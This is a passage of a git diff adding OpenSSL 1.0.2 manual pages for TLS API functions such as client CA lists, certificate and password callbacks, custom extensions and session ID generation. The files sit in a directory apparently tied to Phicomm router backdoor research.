+ #include <openssl/ssl.h>
+ 
+ void SSL_CTX_set_client_CA_list(SSL_CTX *ctx, STACK_OF(X509_NAME) *list);
+ void SSL_set_client_CA_list(SSL *s, STACK_OF(X509_NAME) *list);
+ int SSL_CTX_add_client_CA(SSL_CTX *ctx, X509 *cacert);
+ int SSL_add_client_CA(SSL *ssl, X509 *cacert);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_client_CA_list() sets the B<list> of CAs sent to the client when
+requesting a client certificate for B<ctx>.
+
+SSL_set_client_CA_list() sets the B<list> of CAs sent to the client when
+requesting a client certificate for the chosen B<ssl>, overriding the
+setting valid for B<ssl>'s SSL_CTX object.
+
+SSL_CTX_add_client_CA() adds the CA name extracted from B<cacert> to the
+list of CAs sent to the client when requesting a client certificate for
+B<ctx>.
+
+SSL_add_client_CA() adds the CA name extracted from B<cacert> to the
+list of CAs sent to the client when requesting a client certificate for
+the chosen B<ssl>, overriding the setting valid for B<ssl>'s SSL_CTX object.
+
+=head1 NOTES
+
+When a TLS/SSL server requests a client certificate (see
+B<SSL_CTX_set_verify(3)>), it sends a list of CAs, for which
+it will accept certificates, to the client.
+
+This list must explicitly be set using SSL_CTX_set_client_CA_list() for
+B<ctx> and SSL_set_client_CA_list() for the specific B<ssl>. The list
+specified overrides the previous setting. The CAs listed do not become
+trusted (B<list> only contains the names, not the complete certificates); use
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)> 
+to additionally load them for verification.
+
+If the list of acceptable CAs is compiled in a file, the
+L<SSL_load_client_CA_file(3)|SSL_load_client_CA_file(3)>
+function can be used to help importing the necessary data.
+
+SSL_CTX_add_client_CA() and SSL_add_client_CA() can be used to add additional
+items the list of client CAs. If no list was specified before using
+SSL_CTX_set_client_CA_list() or SSL_set_client_CA_list(), a new client
+CA list for B<ctx> or B<ssl> (as appropriate) is opened.
+
+These functions are only useful for TLS/SSL servers.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_client_CA_list() and SSL_set_client_CA_list() do not return
+diagnostic information.
+
+SSL_CTX_add_client_CA() and SSL_add_client_CA() have the following return
+values:
+
+=over 4
+
+=item Z<>0
+
+A failure while manipulating the STACK_OF(X509_NAME) object occurred or
+the X509_NAME could not be extracted from B<cacert>. Check the error stack
+to find out the reason.
+
+=item Z<>1
+
+The operation succeeded.
+
+=back
+
+=head1 EXAMPLES
+
+Scan all certificates in B<CAfile> and list them as acceptable CAs:
+
+  SSL_CTX_set_client_CA_list(ctx,SSL_load_client_CA_file(CAfile));
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_get_client_CA_list(3)|SSL_get_client_CA_list(3)>,
+L<SSL_load_client_CA_file(3)|SSL_load_client_CA_file(3)>,
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_client_cert_cb.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_client_cert_cb.pod
new file mode 100644
index 0000000..d0df69a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_client_cert_cb.pod
@@ -0,0 +1,94 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_client_cert_cb, SSL_CTX_get_client_cert_cb - handle client certificate callback function
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_client_cert_cb(SSL_CTX *ctx, int (*client_cert_cb)(SSL *ssl, X509 **x509, EVP_PKEY **pkey));
+ int (*SSL_CTX_get_client_cert_cb(SSL_CTX *ctx))(SSL *ssl, X509 **x509, EVP_PKEY **pkey);
+ int (*client_cert_cb)(SSL *ssl, X509 **x509, EVP_PKEY **pkey);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_client_cert_cb() sets the B<client_cert_cb()> callback, that is
+called when a client certificate is requested by a server and no certificate
+was yet set for the SSL object.
+
+When B<client_cert_cb()> is NULL, no callback function is used.
+
+SSL_CTX_get_client_cert_cb() returns a pointer to the currently set callback
+function.
+
+client_cert_cb() is the application defined callback. If it wants to
+set a certificate, a certificate/private key combination must be set
+using the B<x509> and B<pkey> arguments and "1" must be returned. The
+certificate will be installed into B<ssl>, see the NOTES and BUGS sections.
+If no certificate should be set, "0" has to be returned and no certificate
+will be sent. A negative return value will suspend the handshake and the
+handshake function will return immediately. L<SSL_get_error(3)|SSL_get_error(3)>
+will return SSL_ERROR_WANT_X509_LOOKUP to indicate, that the handshake was
+suspended. The next call to the handshake function will again lead to the call
+of client_cert_cb(). It is the job of the client_cert_cb() to store information
+about the state of the last call, if required to continue.
+
+=head1 NOTES
+
+During a handshake (or renegotiation) a server may request a certificate
+from the client. A client certificate must only be sent, when the server
+did send the request.
+
+When a certificate was set using the
+L<SSL_CTX_use_certificate(3)|SSL_CTX_use_certificate(3)> family of functions,
+it will be sent to the server. The TLS standard requires that only a
+certificate is sent, if it matches the list of acceptable CAs sent by the
+server. This constraint is violated by the default behavior of the OpenSSL
+library. Using the callback function it is possible to implement a proper
+selection routine or to allow a user interaction to choose the certificate to
+be sent.
+
+If a callback function is defined and no certificate was yet defined for the
+SSL object, the callback function will be called.
+If the callback function returns a certificate, the OpenSSL library
+will try to load the private key and certificate data into the SSL
+object using the SSL_use_certificate() and SSL_use_private_key() functions.
+Thus it will permanently install the certificate and key for this SSL
+object. It will not be reset by calling L<SSL_clear(3)|SSL_clear(3)>.
+If the callback returns no certificate, the OpenSSL library will not send
+a certificate.
+
+=head1 BUGS
+
+The client_cert_cb() cannot return a complete certificate chain, it can
+only return one client certificate. If the chain only has a length of 2,
+the root CA certificate may be omitted according to the TLS standard and
+thus a standard conforming answer can be sent to the server. For a
+longer chain, the client must send the complete chain (with the option
+to leave out the root CA certificate). This can only be accomplished by
+either adding the intermediate CA certificates into the trusted
+certificate store for the SSL_CTX object (resulting in having to add
+CA certificates that otherwise maybe would not be trusted), or by adding
+the chain certificates using the
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>
+function, which is only available for the SSL_CTX object as a whole and that
+therefore probably can only apply for one client certificate, making
+the concept of the callback function (to allow the choice from several
+certificates) questionable.
+
+Once the SSL object has been used in conjunction with the callback function,
+the certificate will be set for the SSL object and will not be cleared
+even when L<SSL_clear(3)|SSL_clear(3)> is being called. It is therefore
+mandatory to destroy the SSL object using L<SSL_free(3)|SSL_free(3)>
+and create a new one to return to the previous state.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_use_certificate(3)|SSL_CTX_use_certificate(3)>,
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>,
+L<SSL_get_client_CA_list(3)|SSL_get_client_CA_list(3)>,
+L<SSL_clear(3)|SSL_clear(3)>, L<SSL_free(3)|SSL_free(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_custom_cli_ext.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_custom_cli_ext.pod
new file mode 100644
index 0000000..3fceef9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_custom_cli_ext.pod
@@ -0,0 +1,133 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_add_client_custom_ext, SSL_CTX_add_server_custom_ext - custom TLS extension handling
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_add_client_custom_ext(SSL_CTX *ctx, unsigned int ext_type,
+			           custom_ext_add_cb add_cb,
+			           custom_ext_free_cb free_cb, void *add_arg,
+			           custom_ext_parse_cb parse_cb,
+				   void *parse_arg);
+
+ int SSL_CTX_add_server_custom_ext(SSL_CTX *ctx, unsigned int ext_type,
+			           custom_ext_add_cb add_cb,
+			           custom_ext_free_cb free_cb, void *add_arg,
+			           custom_ext_parse_cb parse_cb,
+				   void *parse_arg);
+
+ int SSL_extension_supported(unsigned int ext_type);
+
+ typedef int (*custom_ext_add_cb)(SSL *s, unsigned int ext_type,
+				  const unsigned char **out,
+				  size_t *outlen, int *al,
+				  void *add_arg);
+
+ typedef void (*custom_ext_free_cb)(SSL *s, unsigned int ext_type,
+				    const unsigned char *out,
+				    void *add_arg);
+
+ typedef int (*custom_ext_parse_cb)(SSL *s, unsigned int ext_type,
+				    const unsigned char *in,
+				    size_t inlen, int *al,
+				    void *parse_arg);
+
+
+=head1 DESCRIPTION
+
+SSL_CTX_add_client_custom_ext() adds a custom extension for a TLS client 
+with extension type B<ext_type> and callbacks B<add_cb>, B<free_cb> and
+B<parse_cb>.
+
+SSL_CTX_add_server_custom_ext() adds a custom extension for a TLS server 
+with extension type B<ext_type> and callbacks B<add_cb>, B<free_cb> and
+B<parse_cb>.
+
+In both cases the extension type must not be handled by OpenSSL internally
+or an error occurs.
+
+SSL_extension_supported() returns 1 if the extension B<ext_type> is handled
+internally by OpenSSL and 0 otherwise.
+
+=head1 EXTENSION CALLBACKS
+
+The callback B<add_cb> is called to send custom extension data to be 
+included in ClientHello for TLS clients or ServerHello for servers. The
+B<ext_type> parameter is set to the extension type which will be added and
+B<add_arg> to the value set when the extension handler was added.
+
+If the application wishes to include the extension B<ext_type> it should
+set B<*out> to the extension data, set B<*outlen> to the length of the
+extension data and return 1.
+
+If the B<add_cb> does not wish to include the extension it must return 0.
+
+If B<add_cb> returns -1 a fatal handshake error occurs using the TLS
+alert value specified in B<*al>.
+
+For clients (but not servers) if B<add_cb> is set to NULL a zero length
+extension is added for B<ext_type>.
+
+For clients every registered B<add_cb> is always called to see if the
+application wishes to add an extension to ClientHello.
+
+For servers every registered B<add_cb> is called once if and only if the
+corresponding extension was received in ClientHello to see if the application
+wishes to add the extension to ServerHello. That is, if no corresponding extension
+was received in ClientHello then B<add_cb> will not be called.
+
+If an extension is added (that is B<add_cb> returns 1) B<free_cb> is called
+(if it is set) with the value of B<out> set by the add callback. It can be
+used to free up any dynamic extension data set by B<add_cb>. Since B<out> is
+constant (to permit use of constant data in B<add_cb>) applications may need to
+cast away const to free the data.
+
+The callback B<parse_cb> receives data for TLS extensions. For TLS clients
+the extension data will come from ServerHello and for TLS servers it will
+come from ClientHello.
+
+The extension data consists of B<inlen> bytes in the buffer B<in> for the
+extension B<extension_type>.
+
+If the B<parse_cb> considers the extension data acceptable it must return
+1. If it returns 0 or a negative value a fatal handshake error occurs
+using the TLS alert value specified in B<*al>.
+
+The buffer B<in> is a temporary internal buffer which will not be valid after
+the callback returns.
+
+=head1 NOTES
+
+The B<add_arg> and B<parse_arg> parameters can be set to arbitrary values
+which will be passed to the corresponding callbacks. They can, for example,
+be used to store the extension data received in a convenient structure or
+pass the extension data to be added or freed when adding extensions.
+
+The B<ext_type> parameter corresponds to the B<extension_type> field of
+RFC5246 et al. It is B<not> a NID.
+
+If the same custom extension type is received multiple times a fatal
+B<decode_error> alert is sent and the handshake aborts. If a custom extension
+is received in ServerHello which was not sent in ClientHello a fatal
+B<unsupported_extension> alert is sent and the handshake is aborted. The
+ServerHello B<add_cb> callback is only called if the corresponding extension
+was received in ClientHello. This is compliant with the TLS specifications.
+This behaviour ensures that each callback is called at most once and that
+an application can never send unsolicited extensions.
+
+=head1 RETURN VALUES
+
+SSL_CTX_add_client_custom_ext() and SSL_CTX_add_server_custom_ext() return 1 for
+success and 0 for failure. A failure can occur if an attempt is made to
+add the same B<ext_type> more than once, if an attempt is made to use an
+extension type handled internally by OpenSSL or if an internal error occurs
+(for example a memory allocation failure).
+
+SSL_extension_supported() returns 1 if the extension B<ext_type> is handled
+internally by OpenSSL and 0 otherwise.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_default_passwd_cb.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_default_passwd_cb.pod
new file mode 100644
index 0000000..2b87f01
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_default_passwd_cb.pod
@@ -0,0 +1,76 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_default_passwd_cb, SSL_CTX_set_default_passwd_cb_userdata - set passwd callback for encrypted PEM file handling
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_default_passwd_cb(SSL_CTX *ctx, pem_password_cb *cb);
+ void SSL_CTX_set_default_passwd_cb_userdata(SSL_CTX *ctx, void *u);
+
+ int pem_passwd_cb(char *buf, int size, int rwflag, void *userdata);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_default_passwd_cb() sets the default password callback called
+when loading/storing a PEM certificate with encryption.
+
+SSL_CTX_set_default_passwd_cb_userdata() sets a pointer to B<userdata> which
+will be provided to the password callback on invocation.
+
+The pem_passwd_cb(), which must be provided by the application, hands back the
+password to be used during decryption. On invocation a pointer to B<userdata>
+is provided. The pem_passwd_cb must write the password into the provided buffer
+B<buf> which is of size B<size>. The actual length of the password must
+be returned to the calling function. B<rwflag> indicates whether the
+callback is used for reading/decryption (rwflag=0) or writing/encryption
+(rwflag=1).
+
+=head1 NOTES
+
+When loading or storing private keys, a password might be supplied to
+protect the private key. The way this password can be supplied may depend
+on the application. If only one private key is handled, it can be practical
+to have pem_passwd_cb() handle the password dialog interactively. If several
+keys have to be handled, it can be practical to ask for the password once,
+then keep it in memory and use it several times. In the last case, the
+password could be stored into the B<userdata> storage and the
+pem_passwd_cb() only returns the password already stored.
+
+When asking for the password interactively, pem_passwd_cb() can use
+B<rwflag> to check, whether an item shall be encrypted (rwflag=1).
+In this case the password dialog may ask for the same password twice
+for comparison in order to catch typos, that would make decryption
+impossible.
+
+Other items in PEM formatting (certificates) can also be encrypted, it is
+however not usual, as certificate information is considered public.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_default_passwd_cb() and SSL_CTX_set_default_passwd_cb_userdata()
+do not provide diagnostic information.
+
+=head1 EXAMPLES
+
+The following example returns the password provided as B<userdata> to the
+calling function. The password is considered to be a '\0' terminated
+string. If the password does not fit into the buffer, the password is
+truncated.
+
+ int pem_passwd_cb(char *buf, int size, int rwflag, void *password)
+ {
+  strncpy(buf, (char *)(password), size);
+  buf[size - 1] = '\0';
+  return(strlen(buf));
+ }
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_use_certificate(3)|SSL_CTX_use_certificate(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_generate_session_id.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_generate_session_id.pod
new file mode 100644
index 0000000..798e844
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_generate_session_id.pod
@@ -0,0 +1,150 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_generate_session_id, SSL_set_generate_session_id, SSL_has_matching_session_id - manipulate generation of SSL session IDs (server only)
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ typedef int (*GEN_SESSION_CB)(const SSL *ssl, unsigned char *id,
+                               unsigned int *id_len);
+
+ int SSL_CTX_set_generate_session_id(SSL_CTX *ctx, GEN_SESSION_CB cb);
+ int SSL_set_generate_session_id(SSL *ssl, GEN_SESSION_CB, cb);
+ int SSL_has_matching_session_id(const SSL *ssl, const unsigned char *id,
+				 unsigned int id_len);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_generate_session_id() sets the callback function for generating
+new session ids for SSL/TLS sessions for B<ctx> to be B<cb>.
+
+SSL_set_generate_session_id() sets the callback function for generating
+new session ids for SSL/TLS sessions for B<ssl> to be B<cb>.
+
+SSL_has_matching_session_id() checks, whether a session with id B<id>
+(of length B<id_len>) is already contained in the internal session cache
+of the parent context of B<ssl>.
+
+=head1 NOTES
+
+When a new session is established between client and server, the server
+generates a session id. The session id is an arbitrary sequence of bytes.
+The length of the session id is 16 bytes for SSLv2 sessions and between
+1 and 32 bytes for SSLv3/TLSv1. The session id is not security critical
+but must be unique for the server. Additionally, the session id is
+transmitted in the clear when reusing the session so it must not contain
+sensitive information.
+
+Without a callback being set, an OpenSSL server will generate a unique
+session id from pseudo random numbers of the maximum possible length.
+Using the callback function, the session id can be changed to contain
+additional information like e.g. a host id in order to improve load balancing
+or external caching techniques.
+
+The callback function receives a pointer to the memory location to put
+B<id> into and a pointer to the maximum allowed length B<id_len>. The
+buffer at location B<id> is only guaranteed to have the size B<id_len>.
+The callback is only allowed to generate a shorter id and reduce B<id_len>;
+the callback B<must never> increase B<id_len> or write to the location
+B<id> exceeding the given limit.
+
+If a SSLv2 session id is generated and B<id_len> is reduced, it will be
+restored after the callback has finished and the session id will be padded
+with 0x00. It is not recommended to change the B<id_len> for SSLv2 sessions.
+The callback can use the L<SSL_get_version(3)|SSL_get_version(3)> function
+to check, whether the session is of type SSLv2.
+
+The location B<id> is filled with 0x00 before the callback is called, so the
+callback may only fill part of the possible length and leave B<id_len>
+untouched while maintaining reproducibility.
+
+Since the sessions must be distinguished, session ids must be unique.
+Without the callback a random number is used, so that the probability
+of generating the same session id is extremely small (2^128 possible ids
+for an SSLv2 session, 2^256 for SSLv3/TLSv1). In order to assure the
+uniqueness of the generated session id, the callback must call
+SSL_has_matching_session_id() and generate another id if a conflict occurs.
+If an id conflict is not resolved, the handshake will fail.
+If the application codes e.g. a unique host id, a unique process number, and
+a unique sequence number into the session id, uniqueness could easily be
+achieved without randomness added (it should however be taken care that
+no confidential information is leaked this way). If the application can not
+guarantee uniqueness, it is recommended to use the maximum B<id_len> and
+fill in the bytes not used to code special information with random data
+to avoid collisions.
+
+SSL_has_matching_session_id() will only query the internal session cache,
+not the external one. Since the session id is generated before the
+handshake is completed, it is not immediately added to the cache. If
+another thread is using the same internal session cache, a race condition
+can occur in that another thread generates the same session id.
+Collisions can also occur when using an external session cache, since
+the external cache is not tested with SSL_has_matching_session_id()
+and the same race condition applies.
+
+When calling SSL_has_matching_session_id() for an SSLv2 session with
+reduced B<id_len>, the match operation will be performed using the
+fixed length required and with a 0x00 padded id.
+
+The callback must return 0 if it cannot generate a session id for whatever
+reason and return 1 on success.
+
+=head1 EXAMPLES
+
+The callback function listed will generate a session id with the
+server id given, and will fill the rest with pseudo random bytes:
+
+ const char session_id_prefix = "www-18";
+
+ #define MAX_SESSION_ID_ATTEMPTS 10
+ static int generate_session_id(const SSL *ssl, unsigned char *id,
+                              unsigned int *id_len)
+      {
+      unsigned int count = 0;
+      const char *version;
+
+      version = SSL_get_version(ssl);
+      if (!strcmp(version, "SSLv2"))
+	  /* we must not change id_len */;
+
+      do      {
+              RAND_pseudo_bytes(id, *id_len);
+              /* Prefix the session_id with the required prefix. NB: If our
+               * prefix is too long, clip it - but there will be worse effects
+               * anyway, eg. the server could only possibly create 1 session
+               * ID (ie. the prefix!) so all future session negotiations will
+               * fail due to conflicts. */
+              memcpy(id, session_id_prefix,
+                      (strlen(session_id_prefix) < *id_len) ?
+                      strlen(session_id_prefix) : *id_len);
+              }
+      while(SSL_has_matching_session_id(ssl, id, *id_len) &&
+              (++count < MAX_SESSION_ID_ATTEMPTS));
+      if(count >= MAX_SESSION_ID_ATTEMPTS)
+              return 0;
+      return 1;
+      }
+
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_generate_session_id() and SSL_set_generate_session_id()
+always return 1.
+
+SSL_has_matching_session_id() returns 1 if another session with the
+same id is already in the cache.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_get_version(3)|SSL_get_version(3)>
+
+=head1 HISTORY
+
+SSL_CTX_set_generate_session_id(), SSL_set_generate_session_id()
+and SSL_has_matching_session_id() have been introduced in
+OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_info_callback.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_info_callback.pod
new file mode 100644
index 0000000..0b4affd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_info_callback.pod
@@ -0,0 +1,153 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_info_callback, SSL_CTX_get_info_callback, SSL_set_info_callback, SSL_get_info_callback - handle information callback for SSL connections
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_info_callback(SSL_CTX *ctx, void (*callback)());
+ void (*SSL_CTX_get_info_callback(const SSL_CTX *ctx))();
+
+ void SSL_set_info_callback(SSL *ssl, void (*callback)());
+ void (*SSL_get_info_callback(const SSL *ssl))();
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_info_callback() sets the B<callback> function, that can be used to
+obtain state information for SSL objects created from B<ctx> during connection
+setup and use. The setting for B<ctx> is overridden from the setting for
+a specific SSL object, if specified.
+When B<callback> is NULL, not callback function is used.
+
+SSL_set_info_callback() sets the B<callback> function, that can be used to
+obtain state information for B<ssl> during connection setup and use.
+When B<callback> is NULL, the callback setting currently valid for
+B<ctx> is used.
+
+SSL_CTX_get_info_callback() returns a pointer to the currently set information
+callback function for B<ctx>.
+
+SSL_get_info_callback() returns a pointer to the currently set information
+callback function for B<ssl>.
+
+=head1 NOTES
+
+When setting up a connection and during use, it is possible to obtain state
+information from the SSL/TLS engine. When set, an information callback function
+is called whenever the state changes, an alert appears, or an error occurs.
+
+The callback function is called as B<callback(SSL *ssl, int where, int ret)>.
+The B<where> argument specifies information about where (in which context)
+the callback function was called. If B<ret> is 0, an error condition occurred.
+If an alert is handled, SSL_CB_ALERT is set and B<ret> specifies the alert
+information.
+
+B<where> is a bitmask made up of the following bits:
+
+=over 4
+
+=item SSL_CB_LOOP
+
+Callback has been called to indicate state change inside a loop.
+
+=item SSL_CB_EXIT
+
+Callback has been called to indicate error exit of a handshake function.
+(May be soft error with retry option for non-blocking setups.)
+
+=item SSL_CB_READ
+
+Callback has been called during read operation.
+
+=item SSL_CB_WRITE
+
+Callback has been called during write operation.
+
+=item SSL_CB_ALERT
+
+Callback has been called due to an alert being sent or received.
+
+=item SSL_CB_READ_ALERT               (SSL_CB_ALERT|SSL_CB_READ)
+
+=item SSL_CB_WRITE_ALERT              (SSL_CB_ALERT|SSL_CB_WRITE)
+
+=item SSL_CB_ACCEPT_LOOP              (SSL_ST_ACCEPT|SSL_CB_LOOP)
+
+=item SSL_CB_ACCEPT_EXIT              (SSL_ST_ACCEPT|SSL_CB_EXIT)
+
+=item SSL_CB_CONNECT_LOOP             (SSL_ST_CONNECT|SSL_CB_LOOP)
+
+=item SSL_CB_CONNECT_EXIT             (SSL_ST_CONNECT|SSL_CB_EXIT)
+
+=item SSL_CB_HANDSHAKE_START
+
+Callback has been called because a new handshake is started.
+
+=item SSL_CB_HANDSHAKE_DONE           0x20
+
+Callback has been called because a handshake is finished.
+
+=back
+
+The current state information can be obtained using the
+L<SSL_state_string(3)|SSL_state_string(3)> family of functions.
+
+The B<ret> information can be evaluated using the
+L<SSL_alert_type_string(3)|SSL_alert_type_string(3)> family of functions.
+
+=head1 RETURN VALUES
+
+SSL_set_info_callback() does not provide diagnostic information.
+
+SSL_get_info_callback() returns the current setting.
+
+=head1 EXAMPLES
+
+The following example callback function prints state strings, information
+about alerts being handled and error messages to the B<bio_err> BIO.
+
+ void apps_ssl_info_callback(SSL *s, int where, int ret)
+	{
+	const char *str;
+	int w;
+
+	w=where& ~SSL_ST_MASK;
+
+	if (w & SSL_ST_CONNECT) str="SSL_connect";
+	else if (w & SSL_ST_ACCEPT) str="SSL_accept";
+	else str="undefined";
+
+	if (where & SSL_CB_LOOP)
+		{
+		BIO_printf(bio_err,"%s:%s\n",str,SSL_state_string_long(s));
+		}
+	else if (where & SSL_CB_ALERT)
+		{
+		str=(where & SSL_CB_READ)?"read":"write";
+		BIO_printf(bio_err,"SSL3 alert %s:%s:%s\n",
+			str,
+			SSL_alert_type_string_long(ret),
+			SSL_alert_desc_string_long(ret));
+		}
+	else if (where & SSL_CB_EXIT)
+		{
+		if (ret == 0)
+			BIO_printf(bio_err,"%s:failed in %s\n",
+				str,SSL_state_string_long(s));
+		else if (ret < 0)
+			{
+			BIO_printf(bio_err,"%s:error in %s\n",
+				str,SSL_state_string_long(s));
+			}
+		}
+	}
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_state_string(3)|SSL_state_string(3)>,
+L<SSL_alert_type_string(3)|SSL_alert_type_string(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_max_cert_list.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_max_cert_list.pod
new file mode 100644
index 0000000..da68cb9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_max_cert_list.pod
@@ -0,0 +1,77 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_max_cert_list, SSL_CTX_get_max_cert_list, SSL_set_max_cert_list, SSL_get_max_cert_list, - manipulate allowed for the peer's certificate chain
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_set_max_cert_list(SSL_CTX *ctx, long size);
+ long SSL_CTX_get_max_cert_list(SSL_CTX *ctx);
+
+ long SSL_set_max_cert_list(SSL *ssl, long size);
+ long SSL_get_max_cert_list(SSL *ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_max_cert_list() sets the maximum size allowed for the peer's
+certificate chain for all SSL objects created from B<ctx> to be <size> bytes.
+The SSL objects inherit the setting valid for B<ctx> at the time
+L<SSL_new(3)|SSL_new(3)> is being called.
+
+SSL_CTX_get_max_cert_list() returns the currently set maximum size for B<ctx>.
+
+SSL_set_max_cert_list() sets the maximum size allowed for the peer's
+certificate chain for B<ssl> to be <size> bytes. This setting stays valid
+until a new value is set.
+
+SSL_get_max_cert_list() returns the currently set maximum size for B<ssl>.
+
+=head1 NOTES
+
+During the handshake process, the peer may send a certificate chain.
+The TLS/SSL standard does not give any maximum size of the certificate chain.
+The OpenSSL library handles incoming data by a dynamically allocated buffer.
+In order to prevent this buffer from growing without bounds due to data
+received from a faulty or malicious peer, a maximum size for the certificate
+chain is set.
+
+The default value for the maximum certificate chain size is 100kB (30kB
+on the 16bit DOS platform). This should be sufficient for usual certificate
+chains (OpenSSL's default maximum chain length is 10, see
+L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>, and certificates
+without special extensions have a typical size of 1-2kB).
+
+For special applications it can be necessary to extend the maximum certificate
+chain size allowed to be sent by the peer, see e.g. the work on
+"Internet X.509 Public Key Infrastructure Proxy Certificate Profile"
+and "TLS Delegation Protocol" at http://www.ietf.org/ and
+http://www.globus.org/ .
+
+Under normal conditions it should never be necessary to set a value smaller
+than the default, as the buffer is handled dynamically and only uses the
+memory actually required by the data sent by the peer.
+
+If the maximum certificate chain size allowed is exceeded, the handshake will
+fail with a SSL_R_EXCESSIVE_MESSAGE_SIZE error.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_max_cert_list() and SSL_set_max_cert_list() return the previously
+set value.
+
+SSL_CTX_get_max_cert_list() and SSL_get_max_cert_list() return the currently
+set value.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_new(3)|SSL_new(3)>,
+L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>
+
+=head1 HISTORY
+
+SSL*_set/get_max_cert_list() have been introduced in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_mode.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_mode.pod
new file mode 100644
index 0000000..2a5aaa5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_mode.pod
@@ -0,0 +1,101 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_mode, SSL_set_mode, SSL_CTX_get_mode, SSL_get_mode - manipulate SSL engine mode
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_set_mode(SSL_CTX *ctx, long mode);
+ long SSL_set_mode(SSL *ssl, long mode);
+
+ long SSL_CTX_get_mode(SSL_CTX *ctx);
+ long SSL_get_mode(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_mode() adds the mode set via bitmask in B<mode> to B<ctx>.
+Options already set before are not cleared.
+
+SSL_set_mode() adds the mode set via bitmask in B<mode> to B<ssl>.
+Options already set before are not cleared.
+
+SSL_CTX_get_mode() returns the mode set for B<ctx>.
+
+SSL_get_mode() returns the mode set for B<ssl>.
+
+=head1 NOTES
+
+The following mode changes are available:
+
+=over 4
+
+=item SSL_MODE_ENABLE_PARTIAL_WRITE
+
+Allow SSL_write(..., n) to return r with 0 < r < n (i.e. report success
+when just a single record has been written). When not set (the default),
+SSL_write() will only report success once the complete chunk was written.
+Once SSL_write() returns with r, r bytes have been successfully written
